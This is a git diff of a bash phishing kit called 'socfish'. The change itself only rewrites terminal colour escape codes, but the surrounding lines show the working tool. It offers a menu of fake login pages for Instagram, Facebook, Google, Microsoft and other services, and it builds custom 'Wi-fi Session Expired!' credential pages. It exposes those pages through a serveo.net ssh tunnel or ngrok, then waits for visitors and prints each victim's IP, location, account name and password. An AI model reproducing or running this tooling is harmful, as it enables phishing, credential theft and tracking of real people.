Add files via upload

diff --git a/socfish b/socfish
--- a/socfish
+++ b/socfish
@@ -32,23 +32,23 @@ clear
 
 dependencies() {
 
-command -v php > /dev/null 2>&1 || { echo -e "\n\e[1;31m[\e[0m-\e[1;31m] Error, php is not installed!\e[0m"; exit; }
-command -v curl > /dev/null 2>&1 || { echo -e "\n\e[1;31m[\e[0m-\e[1;31m] Error, curl is not installed!\e[0m"; exit; }
+command -v php > /dev/null 2>&1 || { echo -e "\n\033[1;31m[\033[0m-\033[1;31m] Error, php is not installed!\033[0m"; exit; }
+command -v curl > /dev/null 2>&1 || { echo -e "\n\033[1;31m[\033[0m-\033[1;31m] Error, curl is not installed!\033[0m"; exit; }
 
 }
 
 menu() {
 printf "\n"
-printf "\e[1;92m[\e[0m\e[1;77m1\e[0m\e[1;92m]\e[0m\e[1;93m Instagram\e[0m      \e[1;92m[\e[0m\e[1;77m10\e[0m\e[1;92m]\e[0m\e[1;93m Steam\e[0m       \e[1;92m[\e[0m\e[1;77m99\e[0m\e[1;92m]\e[0m\e[1;93m Custom\e[0m\n"
-printf "\e[1;92m[\e[0m\e[1;77m2\e[0m\e[1;92m]\e[0m\e[1;93m Facebook\e[0m       \e[1;92m[\e[0m\e[1;77m11\e[0m\e[1;92m]\e[0m\e[1;93m GitLab\e[0m      \e[1;92m[\e[0m\e[1;77m00\e[0m\e[1;92m]\e[0m\e[1;93m Exit\e[0m\n"
-printf "\e[1;92m[\e[0m\e[1;77m3\e[0m\e[1;92m]\e[0m\e[1;93m Snapchat\e[0m       \e[1;92m[\e[0m\e[1;77m12\e[0m\e[1;92m]\e[0m\e[1;93m Yahoo\e[0m\n"           
-printf "\e[1;92m[\e[0m\e[1;77m4\e[0m\e[1;92m]\e[0m\e[1;93m Twitter\e[0m        \e[1;92m[\e[0m\e[1;77m13\e[0m\e[1;92m]\e[0m\e[1;93m Linkedin\e[0m\n"        
-printf "\e[1;92m[\e[0m\e[1;77m5\e[0m\e[1;92m]\e[0m\e[1;93m GitHub\e[0m         \e[1;92m[\e[0m\e[1;77m14\e[0m\e[1;92m]\e[0m\e[1;93m Protonmail\e[0m\n"
-printf "\e[1;92m[\e[0m\e[1;77m6\e[0m\e[1;92m]\e[0m\e[1;93m Google\e[0m         \e[1;92m[\e[0m\e[1;77m15\e[0m\e[1;92m]\e[0m\e[1;93m Wordpress\e[0m\n"
-printf "\e[1;92m[\e[0m\e[1;77m7\e[0m\e[1;92m]\e[0m\e[1;93m Spotify\e[0m        \e[1;92m[\e[0m\e[1;77m16\e[0m\e[1;92m]\e[0m\e[1;93m Microsoft\e[0m\n"
-printf "\e[1;92m[\e[0m\e[1;77m8\e[0m\e[1;92m]\e[0m\e[1;93m Netflix\e[0m        \e[1;92m[\e[0m\e[1;77m17\e[0m\e[1;92m]\e[0m\e[1;93m Origin\e[0m\n"
-printf "\e[1;92m[\e[0m\e[1;77m9\e[0m\e[1;92m]\e[0m\e[1;93m InstaFollow\e[0m    \e[1;92m[\e[0m\e[1;77m18\e[0m\e[1;92m]\e[0m\e[1;93m Pinterest\e[0m\n"
-read -e -p $'\n\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Choose an option: \e[0m\en' option
+printf "\033[1;92m[\033[0m\033[1;77m1\033[0m\033[1;92m]\033[0m\033[1;93m Instagram\033[0m      \033[1;92m[\033[0m\033[1;77m10\033[0m\033[1;92m]\033[0m\033[1;93m Steam\033[0m       \033[1;92m[\033[0m\033[1;77m99\033[0m\033[1;92m]\033[0m\033[1;93m Custom\033[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m2\033[0m\033[1;92m]\033[0m\033[1;93m Facebook\033[0m       \033[1;92m[\033[0m\033[1;77m11\033[0m\033[1;92m]\033[0m\033[1;93m GitLab\033[0m      \033[1;92m[\033[0m\033[1;77m00\033[0m\033[1;92m]\033[0m\033[1;93m Exit\033[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m3\033[0m\033[1;92m]\033[0m\033[1;93m Snapchat\033[0m       \033[1;92m[\033[0m\033[1;77m12\033[0m\033[1;92m]\033[0m\033[1;93m Yahoo\033[0m\n"           
+printf "\033[1;92m[\033[0m\033[1;77m4\033[0m\033[1;92m]\033[0m\033[1;93m Twitter\033[0m        \033[1;92m[\033[0m\033[1;77m13\033[0m\033[1;92m]\033[0m\033[1;93m Linkedin\033[0m\n"        
+printf "\033[1;92m[\033[0m\033[1;77m5\033[0m\033[1;92m]\033[0m\033[1;93m GitHub\033[0m         \033[1;92m[\033[0m\033[1;77m14\033[0m\033[1;92m]\033[0m\033[1;93m Protonmail\033[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m6\033[0m\033[1;92m]\033[0m\033[1;93m Google\033[0m         \033[1;92m[\033[0m\033[1;77m15\033[0m\033[1;92m]\033[0m\033[1;93m Wordpress\033[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m7\033[0m\033[1;92m]\033[0m\033[1;93m Spotify\033[0m        \033[1;92m[\033[0m\033[1;77m16\033[0m\033[1;92m]\033[0m\033[1;93m Microsoft\033[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m8\033[0m\033[1;92m]\033[0m\033[1;93m Netflix\033[0m        \033[1;92m[\033[0m\033[1;77m17\033[0m\033[1;92m]\033[0m\033[1;93m Origin\033[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m9\033[0m\033[1;92m]\033[0m\033[1;93m InstaFollow\033[0m    \033[1;92m[\033[0m\033[1;77m18\033[0m\033[1;92m]\033[0m\033[1;93m Pinterest\033[0m\n"
+read -e -p $'\n\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Choose an option: \033[0m\en' option
 
 
 if [[ $option == 1 || $option == 01 ]]; then
@@ -159,11 +159,11 @@ fi
 
 banner() {
 
-printf "\e[1;92m  ____            \e[0m\e[1;77m _____ _     _     \e[0m\n"
-printf "\e[1;92m / ___|  ___   ___\e[0m\e[1;77m|  ___(_)___| |__  \e[0m\n"
-printf "\e[1;92m \___ \ / _ \ / __|\e[0m\e[1;77m |_  | / __| '_ \ \e[0m\n"
-printf "\e[1;92m  ___) | (_) | (__\e[0m\e[1;77m|  _| | \__ \ | | |\e[0m\n"
-printf "\e[1;92m |____/ \___/ \___|\e[0m\e[1;77m_|   |_|___/_| |_|\e[0m\n"
+printf "\033[1;92m  ____            \033[0m\033[1;77m _____ _     _     \033[0m\n"
+printf "\033[1;92m / ___|  ___   ___\033[0m\033[1;77m|  ___(_)___| |__  \033[0m\n"
+printf "\033[1;92m \___ \ / _ \ / __|\033[0m\033[1;77m |_  | / __| '_ \ \033[0m\n"
+printf "\033[1;92m  ___) | (_) | (__\033[0m\033[1;77m|  _| | \__ \ | | |\033[0m\n"
+printf "\033[1;92m |____/ \___/ \___|\033[0m\033[1;77m_|   |_|___/_| |_|\033[0m\n"
 
 }
 
@@ -174,19 +174,19 @@ default_user_text="Username:"
 default_pass_text="Password:"
 default_sub_text="Log-In"
 
-read -e -p $'\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Title 1 (Default: \e[0m\e[1;77mWi-fi Session Expired!\e[0m\e[1;92m): \e[0m' cap1
+read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Title 1 (Default: \033[0m\033[1;77mWi-fi Session Expired!\033[0m\033[1;92m): \033[0m' cap1
 cap1="${cap1:-${default_cap1}}"
 
-read -e -p $'\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Title 2 (Default: \e[0m\e[1;77mPlease login again.\e[0m\e[1;92m): \e[0m' cap2
+read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Title 2 (Default: \033[0m\033[1;77mPlease login again.\033[0m\033[1;92m): \033[0m' cap2
 cap2="${cap2:-${default_cap2}}"
 
-read -e -p $'\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Username field (Default: \e[0m\e[1;77mUsername:\e[0m\e[1;92m): \e[0m' user_text
+read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Username field (Default: \033[0m\033[1;77mUsername:\033[0m\033[1;92m): \033[0m' user_text
 user_text="${user_text:-${default_user_text}}"
 
-read -e -p $'\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Password field (Default: \e[0m\e[1;77mPassword:\e[0m\e[1;92m): \e[0m' pass_text
+read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Password field (Default: \033[0m\033[1;77mPassword:\033[0m\033[1;92m): \033[0m' pass_text
 pass_text="${pass_text:-${default_pass_text}}"
 
-read -e -p $'\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Submit field (Default: \e[0m\e[1;77mLog-In\e[0m\e[1;92m): \e[0m' sub_text
+read -e -p $'\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Submit field (Default: \033[0m\033[1;77mLog-In\033[0m\033[1;92m): \033[0m' sub_text
 sub_text="${sub_text:-${default_sub_text}}"
 
 echo "<!DOCTYPE html>" > sites/create/login.html
@@ -215,12 +215,12 @@ catch_cred() {
 account=$(grep -o 'Account:.*' sites/$server/usernames.txt | cut -d " " -f2)
 IFS=$'\n'
 password=$(grep -o 'Pass:.*' sites/$server/usernames.txt | cut -d ":" -f2)
-printf "\e[1;92m[\e[0m\e[0m*\e[0m\e[1;92m]\e[0m\e[1;92m Account:\e[0m\e[1;77m %s\n\e[0m" $account
-printf "\e[1;92m[\e[0m\e[0m*\e[0m\e[1;92m]\e[0m\e[1;92m Password:\e[0m\e[1;77m %s\n\e[0m" $password
+printf "\033[1;92m[\033[0m\033[0m*\033[0m\033[1;92m]\033[0m\033[1;92m Account:\033[0m\033[1;77m %s\n\033[0m" $account
+printf "\033[1;92m[\033[0m\033[0m*\033[0m\033[1;92m]\033[0m\033[1;92m Password:\033[0m\033[1;77m %s\n\033[0m" $password
 cat sites/$server/usernames.txt >> sites/$server/saved.usernames.txt
-printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Saved:\e[0m\e[1;77m sites/%s/saved.usernames.txt\e[0m\n" $server
+printf "\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Saved:\033[0m\033[1;77m sites/%s/saved.usernames.txt\033[0m\n" $server
 sleep 0.5
-printf "\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting for targets...\e[0m\n"
+printf "\n\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for targets...\033[0m\n"
 }
 
 
@@ -229,9 +229,9 @@ touch sites/$server/saved.usernames.txt
 ip=$(grep -a 'IP:' sites/$server/ip.txt | cut -d " " -f2 | tr -d '\r')
 IFS=$'\n'
 ua=$(grep 'User-Agent:' sites/$server/ip.txt | cut -d '"' -f2)
-printf "\e[1;92m[\e[0m\e[0m*\e[0m\e[1;92m] Victim IP:\e[0m\e[1;77m %s\e[0m\n" $ip
-printf "\e[1;92m[\e[0m\e[0m*\e[0m\e[1;92m] User-Agent:\e[0m\e[1;77m %s\e[0m\n" $ua
-printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Saved:\e[0m\e[1;77m %s/saved.ip.txt\e[0m\n" $server
+printf "\033[1;92m[\033[0m\033[0m*\033[0m\033[1;92m] Victim IP:\033[0m\033[1;77m %s\033[0m\n" $ip
+printf "\033[1;92m[\033[0m\033[0m*\033[0m\033[1;92m] User-Agent:\033[0m\033[1;77m %s\033[0m\n" $ua
+printf "\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Saved:\033[0m\033[1;77m %s/saved.ip.txt\033[0m\n" $server
 cat sites/$server/ip.txt >> sites/$server/saved.ip.txt
 
 
@@ -246,82 +246,82 @@ continent=$(grep -o 'Continent.*' iptracker.log | head -n1 | cut -d ">" -f3 | cu
 printf "\n"
 hostnameip=$(grep  -o "</td></tr><tr><th>Hostname:.*" iptracker.log | cut -d "<" -f7 | cut -d ">" -f2)
 if [[ $hostnameip != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] Hostname:\e[0m\e[1;77m %s\e[0m\n" $hostnameip
+printf "\033[1;92m[\033[0m*\033[1;92m] Hostname:\033[0m\033[1;77m %s\033[0m\n" $hostnameip
 fi
 ##
 
 reverse_dns=$(grep -a "</td></tr><tr><th>Hostname:.*" iptracker.log | cut -d "<" -f1)
 if [[ $reverse_dns != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] Reverse DNS:\e[0m\e[1;77m %s\e[0m\n" $reverse_dns
+printf "\033[1;92m[\033[0m*\033[1;92m] Reverse DNS:\033[0m\033[1;77m %s\033[0m\n" $reverse_dns
 fi
 ##
 
 
 if [[ $continent != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] IP Continent:\e[0m\e[1;77m %s\e[0m\n" $continent
+printf "\033[1;92m[\033[0m*\033[1;92m] IP Continent:\033[0m\033[1;77m %s\033[0m\n" $continent
 fi
 ##
 
 country=$(grep -o 'Country:.*' iptracker.log | cut -d ">" -f3 | cut -d "&" -f1)
 if [[ $country != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] IP Country:\e[0m\e[1;77m %s\e[0m\n" $country
+printf "\033[1;92m[\033[0m*\033[1;92m] IP Country:\033[0m\033[1;77m %s\033[0m\n" $country
 fi
 ##
 
 state=$(grep -o "tracking lessimpt.*" iptracker.log | cut -d "<" -f1 | cut -d ">" -f2)
 if [[ $state != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] State:\e[0m\e[1;77m %s\e[0m\n" $state
+printf "\033[1;92m[\033[0m*\033[1;92m] State:\033[0m\033[1;77m %s\033[0m\n" $state
 fi
 ##
 city=$(grep -o "City Location:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 
 if [[ $city != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] City Location:\e[0m\e[1;77m %s\e[0m\n" $city
+printf "\033[1;92m[\033[0m*\033[1;92m] City Location:\033[0m\033[1;77m %s\033[0m\n" $city
 fi
 ##
 
 isp=$(grep -o "ISP:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 if [[ $isp != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] ISP:\e[0m\e[1;77m %s\e[0m\n" $isp
+printf "\033[1;92m[\033[0m*\033[1;92m] ISP:\033[0m\033[1;77m %s\033[0m\n" $isp
 fi
 ##
 
 as_number=$(grep -o "AS Number:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 if [[ $as_number != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] AS Number:\e[0m\e[1;77m %s\e[0m\n" $as_number
+printf "\033[1;92m[\033[0m*\033[1;92m] AS Number:\033[0m\033[1;77m %s\033[0m\n" $as_number
 fi
 ##
 
 ip_speed=$(grep -o "IP Address Speed:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 if [[ $ip_speed != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] IP Address Speed:\e[0m\e[1;77m %s\e[0m\n" $ip_speed
+printf "\033[1;92m[\033[0m*\033[1;92m] IP Address Speed:\033[0m\033[1;77m %s\033[0m\n" $ip_speed
 fi
 ##
 ip_currency=$(grep -o "IP Currency:.*" iptracker.log | cut -d "<" -f3 | cut -d ">" -f2)
 
 if [[ $ip_currency != "" ]]; then
-printf "\e[1;92m[\e[0m*\e[1;92m] IP Currency:\e[0m\e[1;77m %s\e[0m\n" $ip_currency
+printf "\033[1;92m[\033[0m*\033[1;92m] IP Currency:\033[0m\033[1;77m %s\033[0m\n" $ip_currency
 fi
 ##
 rm -rf iptracker.log
-printf "\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting for credentials...\e[0m\n"
+printf "\n\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for credentials...\033[0m\n"
 
 }
 
 
 serverx() {
-printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m] Starting php server...\e[0m\n"
+printf "\033[1;77m[\033[0m\033[1;33m+\033[0m\033[1;77m] Starting php server...\033[0m\n"
 cd sites/$server && php -S 127.0.0.1:$port > /dev/null 2>&1 & 
 sleep 2
-printf "\e[1;77m[\e[0m\e[1;93m+\e[0m\e[1;77m] Starting Serveo...\e[0m\n"
-command -v ssh > /dev/null 2>&1 || { echo -e "\e[1;31m[\e[0m-\e[1;31m] Error, ssh is not installed!\e[0m"; exit; }
+printf "\033[1;77m[\033[0m\033[1;93m+\033[0m\033[1;77m] Starting Serveo...\033[0m\n"
+command -v ssh > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, ssh is not installed!\033[0m"; exit; }
 if [[ -e sendlink ]]; then
 rm -rf sendlink
 fi
 $(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:'$port' serveo.net 2> /dev/null > sendlink ' &
 sleep 10
 send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)
-printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Direct link:\e[0m\e[1;77m %s \n' $send_link
+printf '\033[1;93m[\033[0m\033[1;77m+\033[0m\033[1;93m] Direct link:\033[0m\033[1;77m %s \n' $send_link
 checkfound
 
 
@@ -338,7 +338,7 @@ rm -rf sites/$server/usernames.txt
 fi
 
 default_port="3333" #$(seq 1111 4444 | sort -R | head -n1)
-printf '\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Choose a port (Default:\e[0m\e[1;77m %s\e[0m\e[1;92m): \e[0m' $default_port
+printf '\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Choose a port (Default:\033[0m\033[1;77m %s\033[0m\033[1;92m): \033[0m' $default_port
 read -e port
 port="${port:-${default_port}}"
 serverx
@@ -361,9 +361,9 @@ fi
 if [[ -e ngrok ]]; then
 sleep 0
 else
-command -v unzip > /dev/null 2>&1 || { echo -e "\e[1;31m[\e[0m-\e[1;31m] Error, unzip is not installed!\e[0m"; exit; }
-command -v wget > /dev/null 2>&1 || { echo -e "\e[1;31m[\e[0m-\e[1;31m] Error, wget is not installed!\e[0m"; exit; }
-printf "\e[1;92m[\e[0m+\e[1;92m] Downloading Ngrok...\n"
+command -v unzip > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, unzip is not installed!\033[0m"; exit; }
+command -v wget > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, wget is not installed!\033[0m"; exit; }
+printf "\033[1;92m[\033[0m+\033[1;92m] Downloading Ngrok...\n"
 arch=$(uname -a | grep -o 'arm' | head -n1)
 arch2=$(uname -a | grep -o 'Android' | head -n1)
 if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
@@ -374,7 +374,7 @@ unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
 chmod +x ngrok
 rm -rf ngrok-stable-linux-arm.zip
 else
-printf "\e[1;31m[\e[0m-\e[1;31m] Download failed!\e[0m\n"
+printf "\033[1;31m[\033[0m-\033[1;31m] Download failed!\033[0m\n"
 exit
 fi
 
@@ -387,21 +387,21 @@ unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
 chmod +x ngrok
 rm -rf ngrok-stable-linux-386.zip
 else
-printf "\e[1;31m[\e[0m-\e[1;31m] Download failed!\e[0m\n"
+printf "\033[1;31m[\033[0m-\033[1;31m] Download failed!\033[0m\n"
 exit
 fi
 fi
 fi
 
-printf "\e[1;92m[\e[0m+\e[1;92m] Starting php server...\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] Starting php server...\n"
 cd sites/$server && php -S 127.0.0.1:3333 > /dev/null 2>&1 & 
 sleep 2
-printf "\e[1;92m[\e[0m+\e[1;92m] Starting Ngrok...\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] Starting Ngrok...\n"
 ./ngrok http 3333 > /dev/null 2>&1 &
 sleep 10
 
 link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
-printf "\e[1;92m[\e[0m+\e[1;92m] Direct link:\e[0m\e[1;77m %s\e[0m\n" $link
+printf "\033[1;92m[\033[0m+\033[1;92m] Direct link:\033[0m\033[1;77m %s\033[0m\n" $link
 checkfound
 }
 
@@ -412,10 +412,10 @@ fi
 
 
 printf "\n"
-printf "\e[1;92m[\e[0m\e[1;77m1\e[0m\e[1;92m]\e[0m\e[1;93m Serveo\e[0m\n"
-printf "\e[1;92m[\e[0m\e[1;77m2\e[0m\e[1;92m]\e[0m\e[1;93m Ngrok\e[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m1\033[0m\033[1;92m]\033[0m\033[1;93m Serveo\033[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m2\033[0m\033[1;92m]\033[0m\033[1;93m Ngrok\033[0m\n"
 default_option_server="1"
-read -e -p $'\n\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Choose portfwd service: \e[0m\en' option_server
+read -e -p $'\n\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Choose portfwd service: \033[0m\en' option_server
 option_server="${option_server:-${default_option_server}}"
 if [[ $option_server == 1 || $option_server == 01 ]]; then
 startx
@@ -430,22 +430,22 @@ fi
 
 }
 checkfound() {
-printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting for targets...\e[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for targets...\033[0m\n"
 while [ true ]; do
 
 
 if [[ -e "sites/$server/ip.txt" ]]; then
-printf "\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] Target opened the link!\n"
 sleep 0.5
-printf "\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting for IP...\e[0m\n"
+printf "\n\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for IP...\033[0m\n"
 sleep 0.6
-printf "\e[1;92m[\e[0m+\e[1;92m] IP found!\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] IP found!\n"
 catch_ip
 rm -rf sites/$server/ip.txt
 fi
 sleep 0.5
 if [[ -e "sites/$server/usernames.txt" ]]; then
-printf "\e[1;92m[\e[0m+\e[0m\e[1;92m] Credentials found!\n"
+printf "\033[1;92m[\033[0m+\033[0m\033[1;92m] Credentials found!\n"
 catch_cred
 rm -rf sites/$server/usernames.txt
 fi
